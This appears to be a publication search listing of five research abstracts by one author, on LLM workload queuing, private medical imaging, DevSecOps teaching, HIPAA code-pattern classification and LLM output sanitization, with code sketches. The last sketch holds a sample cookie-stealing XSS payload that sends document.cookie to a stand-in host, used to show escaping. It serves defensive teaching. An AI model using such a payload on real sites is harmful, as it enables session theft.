Search for: All records

Creators/Authors contains: "Riad, ABM"

Note: Clicking a Digital Object Identifier (DOI) link takes you to an external site maintained by the publisher. Some full-text articles may not yet be available free of charge during the embargo (administrative interval).

  1. Large Language Models (LLMs) have demonstrated exceptional capabilities in the field of Artificial Intelligence (AI) and are now widely used in applications worldwide. However, one of their major challenges is handling high-concurrency workloads, especially under extreme conditions. When too many requests arrive simultaneously, LLMs often become unresponsive, which degrades performance and reduces reliability in real-world applications. To address this issue, this paper proposes a queue-based system that separates request handling from direct execution. By implementing a distributed queue, requests are processed in a structured and controlled manner, preventing system overload and ensuring stable performance. This approach also allows for dynamic scalability: additional resources can be allocated as needed to maintain efficiency. Our experimental results show that this method significantly improves resilience under heavy workloads, preventing resource exhaustion and enabling linear scalability. The findings highlight the effectiveness of a queue-based web service in keeping LLMs responsive even under extreme workloads. (A minimal sketch of such a design appears below.)
    Free, publicly-accessible full text available July 8, 2026
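To make the first entry's queue-based design concrete, the following is a minimal sketch using Python's asyncio, not the paper's implementation: the paper describes a distributed queue, whereas this sketch uses a single-process bounded queue, and `call_llm` is a hypothetical stub standing in for a real model backend.

```python
import asyncio

# Hypothetical stand-in for a real LLM backend call; the paper's actual
# model-serving interface is not specified in the abstract.
async def call_llm(prompt: str) -> str:
    await asyncio.sleep(0.1)  # simulate inference latency
    return f"response to: {prompt}"

async def worker(queue: asyncio.Queue) -> None:
    # Each worker pulls requests from the shared queue, so bursts of
    # traffic accumulate in the queue instead of overwhelming the model.
    while True:
        prompt, future = await queue.get()
        try:
            future.set_result(await call_llm(prompt))
        except Exception as exc:
            future.set_exception(exc)
        finally:
            queue.task_done()

async def main() -> None:
    # Bounded queue: when it is full, enqueueing waits (backpressure)
    # instead of letting unbounded requests exhaust resources.
    queue: asyncio.Queue = asyncio.Queue(maxsize=100)
    workers = [asyncio.create_task(worker(queue)) for _ in range(4)]

    # Simulate a burst of concurrent requests; acceptance is decoupled
    # from execution, so the service itself stays responsive.
    futures = []
    for i in range(20):
        fut: asyncio.Future = asyncio.get_running_loop().create_future()
        await queue.put((f"prompt {i}", fut))
        futures.append(fut)

    print(await asyncio.gather(*futures))
    for w in workers:
        w.cancel()

asyncio.run(main())
```

The bounded queue supplies the backpressure: once it fills, `queue.put` waits rather than dropping the system into overload, and capacity scales by adding workers (or, in the distributed case, queue consumers).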
  2. The increasing use of high-dimensional imaging in medical AI raises significant privacy and security concerns. This paper presents a Bootstrap Your Own Latent (BYOL)-based self-supervised learning (SSL) framework for secure image processing, ensuring compliance with HIPAA through privacy-preserving machine learning (PPML) techniques. Our method integrates federated learning, homomorphic encryption, and differential privacy to enhance security while reducing dependence on labeled data. Experimental results on the MNIST and NIH Chest X-ray datasets demonstrate classification accuracies of 97.5% and 99.99% (40% pre-fine-tuning), with improved clustering performance using K-Means (Silhouette Score: 0.5247). These findings validate BYOL’s capability for robust, privacy-preserving image processing while emphasizing the need for fine-tuning to optimize classification performance. (A sketch of BYOL’s core update appears below.)
    Free, publicly-accessible full text available July 8, 2026
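For background on the entry above, the following is a minimal sketch of BYOL's core update rule in PyTorch. The small MLP encoders, the dimensions, and the random tensors standing in for augmented views are illustrative assumptions; the paper's architecture and its federated learning, homomorphic encryption, and differential privacy layers are not reproduced here.

```python
import torch
import torch.nn.functional as F

def byol_loss(online_pred: torch.Tensor, target_proj: torch.Tensor) -> torch.Tensor:
    # Negative cosine similarity between the online network's prediction
    # and the stop-gradient target projection (no negative pairs needed).
    p = F.normalize(online_pred, dim=-1)
    z = F.normalize(target_proj.detach(), dim=-1)
    return 2 - 2 * (p * z).sum(dim=-1).mean()

@torch.no_grad()
def ema_update(target: torch.nn.Module, online: torch.nn.Module, tau: float = 0.99) -> None:
    # The target network tracks the online network by exponential moving
    # average; it is never updated by gradient descent.
    for t, o in zip(target.parameters(), online.parameters()):
        t.mul_(tau).add_((1 - tau) * o)

# Toy MLP encoders standing in for the paper's image encoder.
online = torch.nn.Sequential(torch.nn.Linear(784, 256), torch.nn.ReLU(), torch.nn.Linear(256, 128))
predictor = torch.nn.Linear(128, 128)
target = torch.nn.Sequential(torch.nn.Linear(784, 256), torch.nn.ReLU(), torch.nn.Linear(256, 128))
target.load_state_dict(online.state_dict())

opt = torch.optim.Adam(list(online.parameters()) + list(predictor.parameters()), lr=3e-4)

# Random tensors stand in for two augmented views of the same images.
view1, view2 = torch.rand(32, 784), torch.rand(32, 784)
loss = byol_loss(predictor(online(view1)), target(view2))
opt.zero_grad()
loss.backward()
opt.step()
ema_update(target, online)
print(loss.item())
```

In full BYOL the loss is symmetrized by also predicting view 1 from view 2; this sketch shows one direction to keep the moving parts visible.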
  3. In today’s fast-paced software development environments, DevOps has revolutionized the way teams build, test, and deploy applications by emphasizing automation, collaboration, and continuous integration/continuous delivery (CI/CD). With these advancements, however, comes an increased need to address security proactively, giving rise to the DevSecOps movement, which integrates security practices into every phase of the software development lifecycle. DevOps security remains underrepresented in academic curricula despite its growing importance in industry. To address this gap, this paper presents a hands-on learning module that combines Chaos Engineering and White-box Fuzzing to teach core principles of secure DevOps practices in an authentic, scenario-driven environment. Chaos Engineering lets students intentionally disrupt systems to observe and understand their resilience, while White-box Fuzzing enables systematic exploration of internal code paths to discover corner-case vulnerabilities that typical tests might miss. The module was deployed across three academic institutions, and pre- and post-surveys were conducted to evaluate its impact. Pre-survey data revealed that while most students had prior experience in software engineering and cybersecurity, the majority lacked exposure to DevOps security concepts. Post-survey responses, gathered through ten structured questions, showed highly positive feedback: 66.7% of students strongly agreed, and 22.2% agreed, that the hands-on labs improved their understanding of secure DevOps practices. Participants also reported increased confidence in secure coding, vulnerability detection, and resilient infrastructure design. These findings support the integration of experiential learning techniques such as chaos simulations and white-box fuzzing into security education. By aligning academic training with real-world industry needs, this module effectively prepares students for the complex challenges of modern software development and operations. (A sketch of a coverage-guided fuzzer appears below.)
    Free, publicly-accessible full text available July 8, 2026
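To illustrate the White-box Fuzzing half of the module, here is a self-contained, coverage-guided fuzzer sketch in pure Python. The `target` function with its planted corner-case bug, the mutation strategy, and the iteration budget are all hypothetical; the abstract does not describe the module's actual lab tooling.

```python
import random
import sys

def target(data: str) -> None:
    # Toy target with a hidden corner case, standing in for the kind of
    # bug white-box fuzzing is meant to surface.
    if len(data) > 2 and data[0] == "F":
        if data[1] == "U":
            if data[2] == "Z":
                raise RuntimeError("corner-case bug reached")

def run_with_coverage(data: str) -> set:
    # Record which lines of `target` execute, the "white-box" signal.
    lines = set()
    def tracer(frame, event, arg):
        if event == "line" and frame.f_code.co_name == "target":
            lines.add(frame.f_lineno)
        return tracer
    sys.settrace(tracer)
    try:
        target(data)
    finally:
        sys.settrace(None)
    return lines

def mutate(s: str) -> str:
    # Random character-level mutation: replace, insert, or delete.
    choice = random.randrange(3)
    pos = random.randrange(max(len(s), 1))
    ch = chr(random.randrange(32, 127))
    if choice == 0 and s:
        return s[:pos] + ch + s[pos + 1:]
    if choice == 1:
        return s[:pos] + ch + s[pos:]
    return s[:pos] + s[pos + 1:] if s else ch

corpus, seen = ["AAAA"], set()
random.seed(0)
for _ in range(100_000):
    candidate = mutate(random.choice(corpus))
    try:
        cov = run_with_coverage(candidate)
    except RuntimeError as exc:
        print(f"crash on input {candidate!r}: {exc}")
        break
    if not cov <= seen:  # new code path reached: keep this input
        seen |= cov
        corpus.append(candidate)
```

The loop keeps only inputs that execute previously unseen lines; that feedback lets it climb through the nested conditions far faster than blind random testing would.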
  4. Although software developers of mHealth apps are responsible for protecting patient data and adhering to strict privacy and security requirements, many of them lack awareness of HIPAA regulations and struggle to distinguish between categories of HIPAA rules. Guidance on classifying HIPAA rule patterns is therefore essential for developing secure applications for the Google Play Store. In this work, we identified the limitations of traditional Word2Vec embeddings in processing code patterns. To address this, we adopt multilingual BERT (Bidirectional Encoder Representations from Transformers), which provides contextualized embeddings of the dataset’s attributes. We applied BERT to embed the code patterns in our dataset and then fed these embeddings to various machine learning classifiers. Our results demonstrate that this approach significantly enhances classification performance, with Logistic Regression achieving a remarkable accuracy of 99.95%. We also obtained high accuracy from Support Vector Machine (99.79%), Random Forest (99.73%), and Naive Bayes (95.93%), outperforming existing approaches. This work underscores the effectiveness of contextualized embeddings and showcases their potential for secure application development. (A sketch of the embed-then-classify pipeline appears below.)
    Free, publicly-accessible full text available July 8, 2026
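The embed-then-classify pipeline described in the entry above might look like the following sketch, assuming the Hugging Face transformers and scikit-learn libraries. The toy snippets and binary labels are hypothetical stand-ins for the paper's HIPAA code-pattern dataset, and taking the [CLS] token's final hidden state as the embedding is one common choice rather than a detail confirmed by the abstract.

```python
import torch
from sklearn.linear_model import LogisticRegression
from transformers import AutoModel, AutoTokenizer

# Hypothetical toy snippets and labels standing in for the paper's
# HIPAA code-pattern dataset, which is not reproduced here.
snippets = [
    "cipher = AES.new(key, AES.MODE_GCM)",  # e.g., an encryption pattern
    "log.info(patient.ssn)",                # e.g., an improper-disclosure pattern
    "conn = ssl.wrap_socket(sock)",
    "print(record.diagnosis)",
]
labels = [0, 1, 0, 1]

tokenizer = AutoTokenizer.from_pretrained("bert-base-multilingual-cased")
model = AutoModel.from_pretrained("bert-base-multilingual-cased")

# Embed each snippet with multilingual BERT; the [CLS] token's final
# hidden state serves as a contextualized fixed-length representation.
with torch.no_grad():
    batch = tokenizer(snippets, padding=True, truncation=True, return_tensors="pt")
    embeddings = model(**batch).last_hidden_state[:, 0, :].numpy()

# Feed the contextualized embeddings to a conventional classifier.
clf = LogisticRegression(max_iter=1000).fit(embeddings, labels)
print(clf.predict(embeddings))
```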
  5. Large Language Models (LLMs) have an extensive ability to produce promising output, and people increasingly rely on them because they are easily accessible and deliver rapid, impressive results. However, using these results without appropriate scrutiny poses serious security risks, particularly when they are integrated with other software, APIs, or plugins, because LLM outputs are highly dependent on the prompts they receive. It is therefore essential to carefully sanitize these outputs before using them in other software environments. This paper is designed to teach students about the potential dangers of contaminated LLM output in the context of web development through pre-lab, hands-on, and post-lab experiences. The hands-on lab provides practical guidance on handling LLM vulnerabilities to make applications safe, with real-world examples in Python. This approach aims to give students a deeper understanding of the precautions necessary to secure software against the vulnerabilities introduced by LLM output. (A sketch of such sanitization appears below.)
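As a taste of the lab's subject, here is a short Python sketch that treats LLM output as untrusted input before it reaches a web page: HTML-escaping free text and strictly validating structured responses. The function names, the example payload, and the expected JSON shape are illustrative assumptions, not the paper's lab code.

```python
import html
import json

def render_comment(llm_output: str) -> str:
    # Treat LLM output as untrusted user input: HTML-escape it before
    # embedding it in a page so an injected <script> tag renders inert.
    return f"<p>{html.escape(llm_output)}</p>"

def parse_llm_json(llm_output: str) -> dict:
    # When the model is asked for structured data, parse it strictly and
    # validate its shape instead of eval()-ing or trusting it blindly.
    data = json.loads(llm_output)
    if not isinstance(data, dict) or set(data) != {"title", "body"}:
        raise ValueError("unexpected LLM response shape")
    return data

# A hypothetical contaminated response, e.g., from a prompt-injected model.
malicious = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
print(render_comment(malicious))  # the script tag is escaped, not executable

print(parse_llm_json('{"title": "ok", "body": "safe"}'))
```

The same principle extends to any sink: never pass raw model output to eval(), a shell, or an SQL string; escape or validate it for the specific context first.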